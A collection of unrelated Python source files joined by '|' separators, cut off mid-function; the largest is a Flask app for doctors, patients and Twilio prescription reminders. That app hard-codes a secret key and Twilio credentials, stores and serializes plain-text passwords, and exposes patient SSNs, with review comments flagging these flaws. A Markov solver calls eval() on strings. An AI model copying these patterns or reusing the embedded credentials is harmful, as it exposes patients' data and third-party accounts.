        include_paths = config.get("include_paths", ["."])
        include_paths = [shlex.quote(path) for path in include_paths
                         if os.path.isdir(path) or path.endswith(".py")]

    if len(include_paths) > 0:
        included_paths = " ".join(include_paths)
        cmd = f"{binstub} -r {included_paths} -f json"
        if os.path.exists("/code/.bandit.yaml"):
            cmd = cmd + " -c /code/.bandit.yaml"
        output = subprocess.run([cmd], stdout=subprocess.PIPE, shell=True)
        # BUG FIX: bandit emits JSON, so parse it with json.loads.
        # ast.literal_eval cannot parse the JSON literals true/false/null.
        report = json.loads(output.stdout.decode('utf8'))
        # Emit one CodeClimate issue document per bandit result,
        # NUL-terminated as the engine spec requires.
        for result in report["results"]:
            issue = {  # renamed from `dict`, which shadowed the builtin
                "type": "issue",
                "check_name": result["test_name"],
                "description": result["issue_text"],
                "categories": ["Security"],
                "severity": severity(result["issue_severity"]),
                "fingerprint": hashlib.md5((result["test_id"] + result['filename'] + result['code']).encode('utf-8')).hexdigest(),
                "location": {
                    "path": result["filename"],
                    "lines": {
                        "begin": min(result["line_range"]),
                        "end": max(result["line_range"])
                    }
                }
            }
            print(json.dumps(issue) + '\0')
else:
    print("Empty workspace; skipping...", file=sys.stderr)
|
from flask import Flask
from flask_sqlalchemy import SQLAlchemy
from flask import request, jsonify
from flask_cors import CORS
from twilio.rest import TwilioRestClient
from flask_apscheduler import APScheduler
# BUG FIX: the flask.ext.* import shim was removed in Flask 1.0;
# import the extension package directly.
from flask_session import Session
from flask_login import LoginManager, login_required, login_user, logout_user
import datetime
app = Flask(__name__)
CORS(app)  # allow cross-origin requests from the frontend
app.config['SQLALCHEMY_DATABASE_URI'] = 'sqlite:////tmp/test.db'
db = SQLAlchemy(app)
# NOTE(review): hard-coded secret key committed to source control —
# load it from the environment instead.
app.secret_key = 'A0Zr98j/37X R~XaH!jcN]LDX/,?ET'
app.config['SESSION_TYPE'] = 'filesystem'
sess = Session()
sess.init_app(app)
# NOTE(review): this constant is never copied into app.config, so as
# written it has no effect on the scheduler.
SCHEDULER_API_ENABLED = True
scheduler = APScheduler()
scheduler.init_app(app)
scheduler.start()
login_manager = LoginManager()
login_manager.session_protection = None
login_manager.login_view = "loginDoc"
login_manager.init_app(app)
LOGGED_IN_USER = None  # appears unused in this file
###############################################################################
# MODEL
###############################################################################
class Doctor(db.Model):
    """A doctor account; also serves as the Flask-Login user model.

    NOTE(review): passwords are stored in plain text and included in
    to_dict() — they should be hashed and never serialized.
    """
    id = db.Column(db.Integer, primary_key=True)
    name = db.Column(db.String(256), index=True)
    address = db.Column(db.String(256), index=True)
    dob = db.Column(db.DateTime, index=True)
    practiceName = db.Column(db.String(256), index=True)
    specialty = db.Column(db.String(256), index=True)
    email = db.Column(db.String(256), index=True, unique=True)
    password = db.Column(db.String(256), index=True)
    # Set True on login and False on logout; read by is_authenticated().
    authenticated = db.Column(db.Boolean, default=False)

    def is_active(self):
        """True, as all users are active."""
        return True

    def get_id(self):
        """Return the email address to satisfy Flask-Login's requirements."""
        return self.email

    def is_authenticated(self):
        """Return True if the user is authenticated."""
        return self.authenticated

    def is_anonymous(self):
        """False, as anonymous users aren't supported."""
        return False

    def to_dict(self):
        """Serialize the doctor to a JSON-compatible dict (includes the password)."""
        d = {
            'id': self.id,
            'name': self.name,
            'address': self.address,
            'dob': self.dob,
            'practiceName': self.practiceName,
            'specialty': self.specialty,
            'email': self.email,
            'password': self.password,
        }
        return d
@login_manager.user_loader
def load_user(user_id):
    """Flask-Login user loader: restore the doctor for a session.

    BUG FIX: Doctor.get_id() returns the doctor's *email*, but the previous
    implementation looked the value up with Doctor.query.get(), i.e. by the
    integer primary key — so sessions could never be restored. Look up by
    email instead; filter_by(...).first() returns None when no row matches,
    which is what Flask-Login expects for unknown users.
    """
    return Doctor.query.filter_by(email=user_id).first()
class Patient(db.Model):
    """A patient belonging to a doctor.

    NOTE(review): phoneNumber is an Integer column, which silently drops
    leading zeros and formatting — a string column would be safer; confirm.
    """
    id = db.Column(db.Integer, primary_key=True)
    name = db.Column(db.String(256), index=True)
    phoneNumber = db.Column(db.Integer)
    email = db.Column(db.String(256), index=True)
    address = db.Column(db.String(256), index=True)
    dob = db.Column(db.DateTime, index=True)
    ssn = db.Column(db.String, index=True)
    # Owning doctor; the backref exposes doctor.patients.
    doctor = db.relationship('Doctor',
                             backref=db.backref('patients'))
    doctor_id = db.Column(db.Integer, db.ForeignKey('doctor.id'))

    def to_dict(self):
        """Serialize the patient, including all of their prescriptions."""
        d = {
            'id': self.id,
            'name': self.name,
            'address': self.address,
            'dob': self.dob,
            'ssn': self.ssn,
            'email': self.email,
            'phoneNumber': self.phoneNumber,
            'prescriptions': [p.to_dict() for p in self.prescriptions]
        }
        return d
class Prescription(db.Model):
    """A drug prescription linking one patient and one doctor."""
    id = db.Column(db.Integer, primary_key=True)
    patient_id = db.Column(db.Integer, db.ForeignKey('patient.id'))
    # The backref exposes patient.prescriptions.
    patient = db.relationship('Patient',
                              backref=db.backref('prescriptions'))
    doctor_id = db.Column(db.Integer, db.ForeignKey('doctor.id'))
    # The backref exposes doctor.prescriptions.
    doctor = db.relationship('Doctor',
                             backref=db.backref('prescriptions'))
    drugName = db.Column(db.String(256), index=True)
    dosage = db.Column(db.Integer, index=True)
    # take every x days
    dosagePeriod = db.Column(db.Integer, index=True)
    # number of doses per period
    dosageNumber = db.Column(db.Integer, index=True)
    totalNumDoses = db.Column(db.Integer, index=True)
    datePrescribed = db.Column(db.DateTime, index=True)
    # Free-text time-of-day markers ("Morning"/"Noon"/"Evening" are matched
    # by substring in checkPrescriptions).
    timeOfDay = db.Column(db.String(256), index=True)
    pharmacyFilled = db.Column(db.Boolean, index=True)

    def to_dict(self):
        """Serialize the prescription to a JSON-compatible dict."""
        d = {
            'patient_id': self.patient_id,
            'doctor_id': self.doctor_id,
            'drugName': self.drugName,
            'dosage': self.dosage,
            'dosagePeriod': self.dosagePeriod,
            'dosageNumber': self.dosageNumber,
            'totalNumDoses': self.totalNumDoses,
            'datePrescribed': self.datePrescribed,
            'timeOfDay': self.timeOfDay,
            'pharmacyFilled': self.pharmacyFilled
        }
        return d
# db.drop_all()  # uncomment to wipe the schema during development
db.create_all()  # create any missing tables at import time
#############################################################################
# VIEW
#############################################################################
def createDoc(email, password, name="", address="",
              practiceName="", specialty=""):
    """Persist and return a new Doctor record."""
    doc = Doctor()
    for field, value in (('email', email),
                         ('password', password),
                         ('name', name),
                         ('address', address),
                         ('practiceName', practiceName),
                         ('specialty', specialty)):
        setattr(doc, field, value)
    db.session.add(doc)
    db.session.commit()
    return doc
def createPatient(doctor, name, phoneNumber, email="", address="",
                  ssn=None):
    """Persist and return a new Patient attached to `doctor`."""
    patient = Patient()
    patient.doctor = doctor
    patient.name, patient.phoneNumber = name, phoneNumber
    patient.email, patient.address, patient.ssn = email, address, ssn
    db.session.add(patient)
    db.session.commit()
    return patient
def createPrescription(patient, doctor,
                       dosage=None, dosagePeriod=None, dosageNumber=None,
                       totalNumDoses=None,
                       timeOfDay='',
                       pharmacyFilled=False, drugName=''):
    """Persist and return a new Prescription; datePrescribed is set to today."""
    rx = Prescription()
    for attr_name, value in (('patient', patient),
                             ('doctor', doctor),
                             ('drugName', drugName),
                             ('dosage', dosage),
                             ('dosagePeriod', dosagePeriod),
                             ('dosageNumber', dosageNumber),
                             ('totalNumDoses', totalNumDoses),
                             ('datePrescribed', datetime.date.today()),
                             ('timeOfDay', timeOfDay),
                             ('pharmacyFilled', pharmacyFilled)):
        setattr(rx, attr_name, value)
    db.session.add(rx)
    db.session.commit()
    return rx
@app.route('/loginDoctor', methods=['POST'])
def loginDoc():
    """Authenticate a doctor and return their profile plus patient list.

    NOTE(review): credentials are matched against a plain-text password
    column — passwords should be hashed.
    """
    if request.method == 'POST':
        email = request.json['email']
        password = request.json['password']
        doctor = Doctor.query.filter_by(email=email, password=password).first()
        # first() returns None when no row matches; test for that directly
        # instead of the former `type(doctor) != Doctor` comparison.
        if doctor is None:
            return "Invalid username or password"
        doctor.authenticated = True
        db.session.add(doctor)
        db.session.commit()
        login_user(doctor, remember=True)
        plist = [p.to_dict() for p in doctor.patients]
        return jsonify({'doctor': doctor.to_dict(), 'patients': plist})
@app.route('/logout', methods=['POST'])
@login_required
def logout():
    """Logout the current user."""
    # Clear the persistent authenticated flag on the doctor record before
    # ending the Flask-Login session.
    d = Doctor.query.get(int(request.json['id']))
    d.authenticated = False
    db.session.add(d)
    db.session.commit()
    logout_user()
    return "Logged out"
@app.route('/addPrescriptionView', methods=['POST'])
@login_required
def addPrescription():
    """Create a prescription from the posted JSON payload.

    Two fixes:
    - Decorator order: @app.route must be outermost, otherwise Flask
      registers the *unwrapped* view and @login_required never runs.
    - The values were passed positionally, but createPrescription's
      signature is (patient, doctor, dosage, dosagePeriod, dosageNumber,
      totalNumDoses, timeOfDay, pharmacyFilled, drugName) — so drugName
      landed in `dosage`, dosage in `dosagePeriod`, and so on. Keyword
      arguments route every value to the right field.
    """
    if request.method == 'POST':
        createPrescription(Patient.query.get(int(request.json['patient_id'])),
                           Doctor.query.get(int(request.json['doctor_id'])),
                           drugName=request.json['drugName'],
                           dosage=request.json['dosage'],
                           dosagePeriod=request.json['dosagePeriod'],
                           dosageNumber=request.json['dosageNumber'],
                           totalNumDoses=request.json['totalNumDoses'],
                           timeOfDay=request.json['timeOfDay'])
        return "Prescription added"
@app.route('/addPatientView', methods=['POST'])
@login_required
def addPatient():
    """Create a patient for a doctor from the posted JSON payload.

    Decorator order fixed: @app.route must be the outermost decorator,
    otherwise Flask registers the unwrapped view and @login_required
    never runs for incoming requests.
    """
    if request.method == 'POST':
        createPatient(Doctor.query.get(request.json['id']),
                      request.json['name'],
                      request.json['phoneNumber'],
                      request.json['email'],
                      request.json['address'],
                      request.json['ssn'])
        return "Patient added"
@app.route('/getPatients', methods=["POST"])
@login_required
def getPatients():
    """Return all patients of the doctor whose id is the raw JSON body.

    Decorator order fixed: @app.route must be the outermost decorator so
    the login_required-wrapped view is what gets registered; previously
    the unprotected function was registered.
    """
    if request.method == 'POST':
        doc = Doctor.query.get(request.json)
        plist = [p.to_dict() for p in doc.patients]
        return jsonify({'patients': plist})
@app.route('/getPrescriptions', methods=["POST"])
@login_required
def getPrescriptions():
    """Return this doctor's prescriptions for a given patient.

    Decorator order fixed: @app.route must be the outermost decorator,
    otherwise the unprotected view function is the one Flask registers.
    """
    if request.method == 'POST':
        doc = Doctor.query.get(int(request.json['doctor_id']))
        patient = Patient.query.get(int(request.json['patient_id']))
        plist = [prescription.to_dict()
                 for prescription in patient.prescriptions
                 if prescription.doctor == doc]
        return jsonify({'prescriptions': plist})
@app.route('/addDoctorView', methods=['POST'])
def addDoctor():
    """Register a new doctor account from the posted JSON payload."""
    if request.method == 'POST':
        body = request.json
        createDoc(body['email'],
                  body['password'],
                  name=body['name'],
                  address=body['address'],
                  practiceName=body['practiceName'],
                  specialty=body['specialty'])
        return "Doctor added"
@app.route('/sms', methods=['POST'])
@login_required
def textPatient():
    """Send a test SMS to the patient with the posted id.

    Decorator order fixed: @app.route must be the outermost decorator,
    otherwise the unprotected view is what Flask registers.
    """
    if request.method == 'POST':
        patient = Patient.query.get(int(request.json['id']))
        number = str(patient.phoneNumber)
        sendtext(number, message="This is a test message")
        return "success"
#############################################################################
# TWILLIO
#############################################################################
# NOTE(review): hard-coded Twilio credentials committed to source control —
# rotate them and load from environment variables / config instead.
ACCOUNT_SID = "AC196bde1976f17bec537a18d74ddfc9dc"
AUTH_TOKEN = "497c27040c7ef630efe7fb8757ff1c8a"
client = TwilioRestClient(ACCOUNT_SID, AUTH_TOKEN)
class SchedulerConfig(object):
    """APScheduler job table: run checkPrescriptions every minute.

    NOTE(review): this class is never handed to the app/scheduler in this
    file (scheduler.init_app(app) above runs without it), so the job
    appears not to be registered — confirm.
    """
    JOBS = [
        {
            'id': 'sendText',
            'func': 'jobs:checkPrescriptions',  # module:callable reference
            'args': (),
            'trigger': 'interval',
            'seconds': 60
        }
    ]
def checkPrescriptions():
    """Scheduled job: text each patient the doses that are due this hour.

    For every prescription with doses remaining whose dosing period falls
    on today, the due doses are deducted and the drug is added to the
    patient's reminder list when the current hour matches its time of day.

    NOTE(review): days_between() receives date objects here, so it must
    accept dates (not only "%Y-%m-%d" strings).
    """
    MORNING = 8
    NOON = 12
    EVENING = 17
    curDate = datetime.date.today()
    curTime = datetime.datetime.now().hour
    for patient in Patient.query.all():
        phoneNumber = str(patient.phoneNumber)
        drugList = []
        for p in patient.prescriptions:
            if p.totalNumDoses > 0 and (days_between(curDate, p.datePrescribed)
                                        % p.dosagePeriod == 0):
                if "Morning" in p.timeOfDay and curTime == MORNING:
                    drugList.append(p)
                elif "Noon" in p.timeOfDay and curTime == NOON:
                    drugList.append(p)
                elif "Evening" in p.timeOfDay and curTime == EVENING:
                    drugList.append(p)
                else:
                    continue
                # Deduct the dispatched doses and persist the change.
                p.totalNumDoses = p.totalNumDoses - p.dosageNumber
                db.session.add(p)
                db.session.commit()
        # BUG FIX: drugList was passed positionally into the `message`
        # parameter, so patients were texted the Python repr of the list
        # and the drug summary was never built.
        sendtext(phoneNumber, drugList=drugList)
def sendtext(phoneNumber, message=None, drugList=None):
    """Send an SMS: a plain `message`, a formatted `drugList` summary, or both.

    BUG FIX: the first create() call previously ran unconditionally, so a
    drug-list-only call also sent an SMS with body=None.

    :param phoneNumber: destination number (converted to str)
    :param message: optional plain text body
    :param drugList: optional list of Prescription objects to summarize
    """
    if message is not None:
        client.sms.messages.create(to=str(phoneNumber),
                                   from_="18562194208",
                                   body=message)
    if drugList is not None:
        text = "Please take these drugs today: \n"
        for drug in drugList:
            text += "{} doses of {}\n".format(drug.dosageNumber, drug.drugName)
        client.sms.messages.create(to=str(phoneNumber),
                                   from_="18562194208",
                                   body=text)
def days_between(d1, d2):
    """Return the absolute number of whole days between two dates.

    Generalized (backward compatible): accepts ISO "%Y-%m-%d" strings as
    before, and now also date/datetime objects — checkPrescriptions passes
    date objects, which crashed the string-only implementation.
    """
    def _as_date(d):
        if isinstance(d, str):
            return datetime.datetime.strptime(d, "%Y-%m-%d").date()
        if isinstance(d, datetime.datetime):
            return d.date()
        return d
    return abs((_as_date(d2) - _as_date(d1)).days)
|
from discord.ext import commands, tasks
from src.decorators import needsDatabase
from DO.game import GameDO
from singleton.game import Game
class GameCog(commands.Cog):
    """Discord cog (singleton) that closes games and votes as their deadlines pass."""

    # Singleton instance, stored on the class.
    instance = None

    @staticmethod
    def getInstance():
        """Returns the instance of the singleton

        Returns:
            GameCog: The instance
        """
        if GameCog.instance is None:
            GameCog()
        return GameCog.instance

    def __init__(self):
        # Enforce the singleton: register self and refuse a second
        # construction (use getInstance() instead of calling directly).
        if GameCog.instance is not None:
            raise Exception("This class is a singleton !")
        GameCog.instance = self
        # Games/votes whose end is near; refreshed by the 10 s task below.
        self.nearGames = []
        self.nearVotes = []
        self.endGameAndVotes.start()
        self.loadNearlyFinishedGamesAndVotes.start()

    @tasks.loop(seconds=1)
    async def endGameAndVotes(self):
        """Every second, end any game/vote that just finished and announce it."""
        for game in self.nearGames:
            if game.just_ended_game:
                game.endGame()
                # Phase 1: the play phase ended; open the vote.
                await Game.getInstance().advertiseEnd(game_id=game.id, phase=1)
                print("Advertising for votes")
                await Game.getInstance().showParticipations(game_id=game.id, vote=True)
        for vote in self.nearVotes:
            if vote.just_ended_vote:
                vote.endVote()
                # Phase 2: the vote ended; announce the winner.
                await Game.getInstance().advertiseEnd(game_id=vote.id, phase=2)
                print("Advertising for winner")
                await Game.getInstance().showParticipations(game_id=vote.id, vote=False)

    @needsDatabase
    def getNearlyEndingGames(self, db):
        """Retrieve both the nearly ending games and the nearly ending votes.

        `db` is injected by the @needsDatabase decorator. 300 is the
        look-ahead window handed to the SQL scripts (presumably seconds —
        TODO confirm against the scripts).
        """
        games = db.fetch(script="get_ending_games", params=(300,))
        nearGames = []
        for game_id in games:
            game = GameDO(id=int(game_id[0])).load()
            nearGames.append(game)
        self.nearGames = nearGames
        votes = db.fetch(script="get_ending_votes", params=(300,))
        nearVotes = []
        for vote_id in votes:
            vote = GameDO(id=int(vote_id[0])).load()
            nearVotes.append(vote)
        self.nearVotes = nearVotes

    @tasks.loop(seconds=10)
    async def loadNearlyFinishedGamesAndVotes(self):
        """
        Cog task to retrieve both the nearly ending games and the
        nearly ending votes
        """
        self.getNearlyEndingGames()
|
from dataclasses import dataclass
import datetime
@dataclass
class Learning:
    """A single "today I learned" entry.

    Attributes mirror the TIL model: a short headline, a longer free-form
    explanation, and the day the entry was recorded.
    """
    title: str
    description: str
    timestamp: datetime.date
|
from django.urls import re_path
from .views import SingleSignOn
# Map "/sso/" to the SingleSignOn view.
urlpatterns = [re_path(r"^sso/$", SingleSignOn.as_view())]
|
import requests
from optimizely_platform import exceptions
from optimizely_platform import objects
def get_dynamic_audience_conditions(integration_settings):
    """Fetch the partner's campaigns and expose them as audience conditions.

    Args:
        integration_settings: dict that must contain 'account_id'.

    Returns:
        A single-element list holding one AudienceCondition named
        'Sample Condition' whose options are the partner's campaigns.
    """
    AUDIENCE_OPTIONS_ENDPOINT = (
        'https://integrations.optimizely.how/api/{0}/campaigns.json')
    account_id = integration_settings['account_id']
    request_url = AUDIENCE_OPTIONS_ENDPOINT.format(account_id)
    response = requests.get(request_url).json()
    # Build list of audience conditions.  (The previous bare
    # `try/except: raise` wrapper was a no-op and has been removed.)
    audience_condition_options = [
        objects.AudienceConditionOption(campaign['identifier'],
                                        campaign['name'].strip())
        for campaign in response['campaigns']
    ]
    return [objects.AudienceCondition('Sample Condition', audience_condition_options)]
def validate_integration_settings(integration_settings):
    """Validate settings by verifying the account with the partner service.

    Raises:
        exceptions.IntegrationSettingsValidationError: if the account id is
            missing or the verification request fails.
    """
    try:
        verify_account(integration_settings['account_id'])
    # Narrowed from a bare `except:` (which also swallowed SystemExit and
    # KeyboardInterrupt) and chained so the root cause is preserved.
    except Exception as err:
        raise exceptions.IntegrationSettingsValidationError(
            'Your Account ID appears to be invalid.') from err
def verify_account(account_id):
    """Ask the sample service whether *account_id* is valid; return its JSON."""
    VERIFY_ACCOUNT_ENDPOINT = 'https://api.sample-app.com/verify/'
    verification_url = VERIFY_ACCOUNT_ENDPOINT + account_id
    return requests.get(verification_url).json()
|
from typing import Iterable, List, Tuple, Any
from dataclasses import dataclass, field
import logging
import sys
from abc import abstractmethod, ABCMeta
import itertools as it
import pandas as pd
from zensols.persist import Stash, PrimeableStash
from zensols.multi import MultiProcessStash
from zensols.nlp import FeatureDocument
from zensols.deepnlp.vectorize import FeatureDocumentVectorizerManager
logger = logging.getLogger(__name__)
@dataclass
class DocumentFeatureStash(MultiProcessStash, metaclass=ABCMeta):
    """This class parses natural language text in to :class:`.FeatureDocument`
    instances in multiple sub processes.
    .. document private functions
    .. automethod:: _parse_document
    """
    ATTR_EXP_META = ('document_limit',)
    factory: Stash = field()
    """The stash that creates the ``factory_data`` given to
    :meth:`_parse_document`.
    """
    vec_manager: FeatureDocumentVectorizerManager = field()
    """Used to parse text in to :class:`.FeatureDocument` instances.
    """
    document_limit: int = field(default=sys.maxsize)
    """The maximum number of documents to process."""
    def prime(self):
        """Prime the backing factory stash first (when it supports priming)."""
        if isinstance(self.factory, PrimeableStash):
            self.factory.prime()
        super().prime()
    @abstractmethod
    def _parse_document(self, id: int, factory_data: Any) -> FeatureDocument:
        """Parse one item's *factory_data* in to a :class:`.FeatureDocument`."""
        pass
    def _create_data(self) -> Iterable[str]:
        # Lazily take at most ``document_limit`` keys from the factory;
        # annotation corrected from List[str]: islice returns an iterator.
        return it.islice(self.factory.keys(), self.document_limit)
    def _process(self, chunk: List[str]) -> \
            Iterable[Tuple[str, FeatureDocument]]:
        """Parse each id in *chunk*, yielding ``(id, FeatureDocument)`` pairs."""
        logger.info(f'processing chunk with {len(chunk)} ids')
        for id, factory_data in map(lambda id: (id, self.factory[id]), chunk):
            data = self._parse_document(id, factory_data)
            yield (id, data)
@dataclass
class DataframeDocumentFeatureStash(DocumentFeatureStash):
    """Creates :class:`.FeatureDocument` instances from :class:`pandas.Series` rows
    from the :class:`pandas.DataFrame` stash values.
    """
    text_column: str = field(default='text')
    """The column name for the text to be parsed by the document parser."""
    additional_columns: Tuple[str] = field(default=None)
    """A tuple of column names to add as position argument to the instance."""
    def _parse_document(self, id: int, row: pd.Series) -> FeatureDocument:
        # the text handed to the (SpaCy) document parser
        doc_text = row[self.text_column]
        # gather any extra per-row values passed through positionally
        if self.additional_columns is None:
            extra_vals = ()
        else:
            extra_vals = tuple(row[col] for col in self.additional_columns)
        return self.vec_manager.parse(doc_text, *extra_vals)
|
import sympy
from graphviz import Digraph
from markov_solver.core.model.markov_link import MarkovLink
from markov_solver.core.model.markov_state import MarkovState
FLOATING_POINT_PRECISION = 12
class MarkovChain:
    """A finite Markov chain: states, directed links carrying (possibly
    symbolic string) transition values, and named symbol values used when
    evaluating those expressions."""
    def __init__(self):
        self.states = set()    # set of MarkovState
        self.links = set()     # set of MarkovLink (tail -> head with a value)
        self.symbols = dict()  # symbol name -> numeric value, for expression links
    def add_state(self, value):
        """Add a state (wrapping a raw value in MarkovState if needed); return it."""
        state = value if isinstance(value, MarkovState) else MarkovState(value)
        self.states.add(state)
        return state
    def add_link(self, link):
        """Add *link* when not already present; return True iff it was added."""
        if link not in self.links:
            self.links.add(link)
            return True
        return False
    def add_symbols(self, **kwargs):
        """Register symbol values, e.g. ``add_symbols(p=0.9)``."""
        for symbol, value in kwargs.items():
            self.symbols[symbol] = value
    def in_links(self, state):
        """Links entering *state* (their head is *state*)."""
        return list(l for l in self.links if l.head == state)
    def out_links(self, state):
        """Links leaving *state* (their tail is *state*)."""
        return list(l for l in self.links if l.tail == state)
    def find_link(self, state1, state2):
        """The link state1 -> state2, or None when absent."""
        return next((l for l in self.out_links(state1) if l.head == state2), None)
    def get_states(self):
        """All states, sorted."""
        return sorted(self.states)
    def transition_matrix(self, evaluate=False):
        """Build the row-normalized transition matrix as expression strings.

        Each non-zero entry becomes "(value)/(sum of the row's values)".
        With ``evaluate=True`` the expressions are reduced to floats using
        the registered symbols.
        """
        states = sorted(self.get_states())  # NOTE(review): get_states() already sorts
        tmatrix = []
        for state1 in states:
            row = []
            normalization_factor = None
            for state2 in states:
                link = self.find_link(state1, state2)
                link_value = 0.0 if link is None else link.value
                row.append(link_value)
                if link_value != 0.0:
                    # assumes non-zero link values are strings (join would
                    # fail on numeric values) — TODO confirm
                    normalization_factor = "+".join(filter(None, (normalization_factor, link_value)))
            for i in range(len(row)):
                if row[i] != 0.0:
                    row[i] = "({})/({})".format(row[i], normalization_factor)
            tmatrix.append(row)
        if evaluate is True:
            for r in range(len(tmatrix)):
                for c in range(len(tmatrix[r])):
                    tmatrix[r][c] = self.__evaluate_factor(tmatrix[r][c])
        return tmatrix
    def solve(self):
        """
        Solves a Markov Chain.
        :return: the solutions of the Markov Chain, keyed by state name.
        """
        equations, variables = self.generate_sympy_equations()
        solutions = sympy.solve(equations, variables)
        state_solutions = {}
        for symbol, value in solutions.items():
            state_solutions[symbol.name] = value
        return state_solutions
    def generate_sympy_equations(self):
        """
        Generate sympy flow equations from the Markov chain.
        :return: the list of equations and the set of state variables.
        """
        variables = set()
        equations = []
        # One balance equation per state: outflow minus inflow equals zero.
        for eqn in self.generate_equations():
            equation = 0
            lhs = eqn[0]
            rhs = eqn[1]
            for lhs_link in lhs:
                variable = sympy.Symbol(lhs_link.tail.pretty_str())
                variables.add(variable)
                link_value = self.__evaluate_factor(lhs_link.value)
                equation += variable * link_value
            for rhs_link in rhs:
                variable = sympy.Symbol(rhs_link.tail.pretty_str())
                variables.add(variable)
                link_value = self.__evaluate_factor(rhs_link.value)
                equation -= variable * link_value
            equations.append(equation)
        # Normalization constraint: the state probabilities sum to one.
        equation = -1
        for variable in variables:
            equation += variable
        equations.append(equation)
        return equations, variables
    def generate_equations(self):
        """
        Generate flow equations from the Markov chain.
        :return: the list of (out_links, in_links) pairs, one per state.
        """
        equations = []
        for s in sorted(self.states):
            lhs = self.out_links(s)
            rhs = self.in_links(s)
            equations.append((lhs, rhs))
        return equations
    def matrixs(self):
        """
        Return the string representation of the matrix (one CSV row per line).
        :return: the string representation.
        """
        s = ""
        for r in self.transition_matrix():
            s += "{}\n".format(",".join(map(str, r)))
        return s
    def render_graph(self, filename="out/MarkovChain", format="svg"):
        """Render the chain with graphviz: one node per state, one labelled
        edge per link."""
        graph = Digraph(engine="dot")
        graph.attr(rankdir="LR")
        for state in sorted(self.states):
            graph.node(str(state))
            # graph.node(str(state), pos="{},{}!".format(int(state.value[0]) * 2, -int(state.value[1]) * 2))
        for link in self.links:
            graph.edge(str(link.tail), str(link.head), str(link.value))
        graph.render(filename=filename, format=format)
    def __evaluate_factor(self, factor):
        """Reduce *factor* to a float, substituting registered symbol values.

        NOTE(review): uses eval() on the expression string — only safe for
        trusted chain definitions.
        """
        if isinstance(factor, int) or isinstance(factor, float):
            return factor
        value = factor
        # Plain text substitution of symbol names by their numeric values.
        for k, v in self.symbols.items():
            value = value.replace(k, str(v))
        return round(eval(value), FLOATING_POINT_PRECISION)
    def __str__(self):
        return "States: {}\nLinks: {}\nSymbols: {}\n".format(sorted(self.states), sorted(self.links), self.symbols)
    def __repr__(self):
        return self.__str__()
if __name__ == "__main__":
    # Demo: three-state market model with symbolic transition rates.
    markov_chain = MarkovChain()
    s_0_0 = MarkovState((0, 0)) # Bull Market
    s_0_1 = MarkovState((0, 1)) # Bear Market
    s_1_0 = MarkovState((1, 0)) # Stagnant Market
    markov_chain.add_state(s_0_0)
    markov_chain.add_state(s_0_1)
    markov_chain.add_state(s_1_0)
    markov_chain.add_symbols(p=0.9, q=0.8, r=0.5)
    markov_chain.add_link(MarkovLink(s_0_0, s_0_0, "p"))
    markov_chain.add_link(MarkovLink(s_0_0, s_0_1, "(1-p)*0.75"))
    markov_chain.add_link(MarkovLink(s_0_0, s_1_0, "(1-p)*0.25"))
    markov_chain.add_link(MarkovLink(s_0_1, s_0_1, "q"))
    markov_chain.add_link(MarkovLink(s_0_1, s_0_0, "(1-q)*0.75"))
    markov_chain.add_link(MarkovLink(s_0_1, s_1_0, "(1-q)*0.25"))
    markov_chain.add_link(MarkovLink(s_1_0, s_1_0, "r"))
    markov_chain.add_link(MarkovLink(s_1_0, s_0_0, "(1-r)*0.5"))
    markov_chain.add_link(MarkovLink(s_1_0, s_0_1, "(1-r)*0.5"))
    print(markov_chain)
    markov_chain.render_graph()
    for s in markov_chain.states:
        print(s.pretty_str())
    print(markov_chain.transition_matrix())
    print(markov_chain.transition_matrix(evaluate=True))
    print(markov_chain.matrixs())
    # Dump the raw flow equations in a readable "lhs = rhs" form.
    eqn_string = ""
    for eqn in markov_chain.generate_equations():
        lhs = eqn[0]
        rhs = eqn[1]
        for factor in lhs:
            eqn_string += "{}*{}+".format(factor.value, factor.head)
        eqn_string += "="
        for factor in rhs:
            eqn_string += "{}*{}+".format(factor.value, factor.tail)
        eqn_string += "\n"
    print(eqn_string)
    # NOTE(review): generate_sympy_equations() returns an (equations,
    # variables) tuple, so this loop prints those two collections rather
    # than individual equations — confirm intent.
    for eqn in markov_chain.generate_sympy_equations():
        print(eqn)
    solutions = markov_chain.solve()
    for k, v in sorted(solutions.items()):
        print("{}={}".format(k, v))
|
# Print the name of every variable in the user's environment, one per line.
import os

print("\n".join(os.environ))
#!/usr/bin/env python
from argparse import ArgumentParser
from greengraph import Greengraph
from matplotlib import pyplot as plt
def process():
    """Command-line entry point: plot the 'green-ness' of satellite images
    sampled between two locations and save the plot to a file."""
    parser = ArgumentParser(description = "Plot the 'green-ness' of satellite images between two places")
    parser.add_argument('--start', help='Choose a start location')
    parser.add_argument('--end', help='Choose an end location')
    # BUG FIX: --steps arrived as a string; green_between() needs a count.
    parser.add_argument('--steps', type=int, help='Choose number of steps')
    parser.add_argument('--out', help='Choose name of output file')
    arguments = parser.parse_args()
    mygraph = Greengraph(arguments.start, arguments.end)
    data = mygraph.green_between(arguments.steps)
    plt.plot(data)
    plt.savefig(arguments.out)

if __name__ == "__main__":
    process()
# from _thread import start_new_thread
import simpleaudio as sa
def play_note_by_key_place(piano_key: int) -> None:
    """Play the .wav sample for the white key at position *piano_key* (1-7).

    Unknown positions fall back to the C sample.
    """
    key_to_note = {1: "C", 2: "D", 3: "E", 4: "F", 5: "G", 6: "A", 7: "B"}
    note_name = key_to_note.get(piano_key, 'C')
    sa.WaveObject.from_wave_file(f"sounds/{note_name}.wav").play()
|
"""
@author: Viet Nguyen (nhviet1009@gmail.com)
"""
import torch
from torchvision.datasets import CocoDetection
from torch.utils.data.dataloader import default_collate
import os
def collate_fn(batch):
    """Collate COCO samples, dropping empty placeholders.

    The tensor columns (image, boxes, labels) are stacked with
    ``default_collate`` after filtering out non-tensor placeholders; the
    image-id and size columns keep only truthy entries.
    """
    columns = list(zip(*batch))
    for slot in (0, 3, 4):
        columns[slot] = default_collate([v for v in columns[slot] if torch.is_tensor(v)])
    for slot in (1, 2):
        columns[slot] = [v for v in columns[slot] if v]
    return columns
class CocoDataset(CocoDetection):
    """COCO detection dataset yielding normalized boxes and remapped labels.

    Wraps torchvision's CocoDetection, pointing it at the standard
    ``annotations/instances_{mode}{year}.json`` layout under *root*.
    """
    def __init__(self, root, year, mode, transform=None):
        # e.g. root/annotations/instances_train2017.json and root/train2017
        annFile = os.path.join(root, "annotations", "instances_{}{}.json".format(mode, year))
        root = os.path.join(root, "{}{}".format(mode, year))
        super(CocoDataset, self).__init__(root, annFile)
        self._load_categories()
        self.transform = transform
    def _load_categories(self):
        # Map sparse COCO category ids onto a dense 1..N label space,
        # reserving label 0 for the background class.
